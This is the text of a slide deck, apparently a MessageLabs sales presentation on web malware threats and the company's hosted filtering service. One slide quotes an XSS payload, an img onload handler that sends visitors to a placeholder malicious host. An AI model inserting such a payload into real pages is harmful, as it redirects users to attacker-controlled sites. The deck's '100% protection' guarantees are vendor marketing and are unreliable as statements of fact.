Agenda Challenges Corporation Face Web Usage Statistics Web Attacks Solving the Problem MessageLabs Services
The Challenge The Acme corporation faces a common problem, they want to allow their users business and reasonable personal web access but they want to make sure that they are protected against the common threats: Productivity Offensive Materials Abuse of resources Malware
Lots of websites Average 2,465 new malware websites per day.
Why malware? Monetize the attack.
Install my software – botnet - spam / DDOS
Steal your credentials - bank theft / fraud
Steal your data – confidential data / fraud
How do you get it? Bad Links Advertising XSS Gumblar Services 6
Getting Web Malware Bad Link postcard.jpg.exe
Advertise It Subvert a legitimate website Adverts
Fake AV Advert
XSS Attack User content No. Your wrong. Duh! Its “you’re”. I agree. <img src=“/images/smiley.gif” onload=“document.location=‘http://malicious/’”>
Web Malware Malware Malicious instructions Browser / JS / Flash / PDF Complete control Victim Bad Guy
Gumblar Lifecycle User visits website with XSS exploit User is forwarded to host serving malware Malware installed (often flash or PDF) Malware steals website logins, forwards to hacker Hacker logs into website, installs XSS exploit
Gumblar Prevalance Up to 60% of all malicious web traffic is Gumblar.
How You Can Protect Yourself 15
Controlling the web IT Management should first consider controlling the Web; Policy engine includes: Categorised URL database MIME and file type lists Time periods User and group based policies Customizable block messages Controls HTTP and HTTPS
Building the policy No access to travel, leisure and sport between 9am and 5pm No access to sex, guns or drugs No access to streaming audio and video (reduce bandwidth) Only support can download executables
Monitoring access Dashboard – 1 year of high level information Detailed reports up to 6 months of URL and Malware information Customizable reports in PDF format Scheduled reports sent directly to your inbox
Malware Protection Scans HTTP and FTP/HTTP traffic Multiple signature based AV engines Skeptic technology Customizable block messages Converged analysis No noticeable latency
You have choices for Web Security 20
Why use a hosted services over hardware or software?
Why use MessageLabs Services? Best Client and Technical Support Global Support is 24/7/365 & included with the service Support SLA protects your business Always get a live person who speaks your language Dedicated CSM team Best Services Awarding Winning Analyst approved Backed by strongest SLAs
Most Robust Global Infrastructure Incorporating 14 data centers spanning four continents Every data center is scalable and secured to the highest standards Clustered high performance servers, each cluster has full redundancy within itself and all other hardware is duplicated 23
Best Service Level Agreements Web Anti-Virus Protection 100% protection from known and unknown email viruses Credit is offered if a client infected by a virus Anti-Virus Protection 100% protection against known viruses Credit is offered if a client infected by a virus Email Archiving Latency Average scanning time of 100% of web content is within 100 milliseconds Credit is offered if latency exceeds 100 milliseconds Virus False Positives 0.0001% FP capture rate Credit is offered if we do not meet this commitment Service Availability 100% uptime Credit is offered if availability falls below 100% Client may terminate if availability falls below 95% Spam Capture Rate 99% capture rate (95% for emails containing Asian characters) Credit is offered if we do not meet this commitment Support Service Availability Guarantee 99.9% uptime for archiving network Client may terminate if availability falls below 90% Spam False Positives 0.0003% FP capture rate Credit is offered if we do not meet this commitment Appliance Replacement Guarantee If appliance fails during the warranty period, MessageLabs will repair or replace the appliance within 3 business days at no cost Latency Average roundtrip time of 100% of email delivered in less than 60 seconds Credit is offered if latency exceeds 1 minute Delivery 100% delivery guarantee Client may terminate if we do not meet this Technical support / Fault Response critical - 95% calls within 2hrs; major - 85% calls within 4hrs; minor - 75% calls within 8hrs Credit is offered if we do not meet this commitment Service Availability 100% uptime Credit is offered if availability falls below 100% Client may terminate if availability falls below 95%
Best Shared Intelligence Accuracy, Reliability & Performance The automatic sharing of knowledge gained in one protocol across all other protocols underpins MessageLabs Converged Threat Analysis. Security solutions that only focus on a single protocol such as email or web, or those that lack integration at the level of threat detection, may not sufficiently protect your business from malware and spyware designed to slip past single protocol security.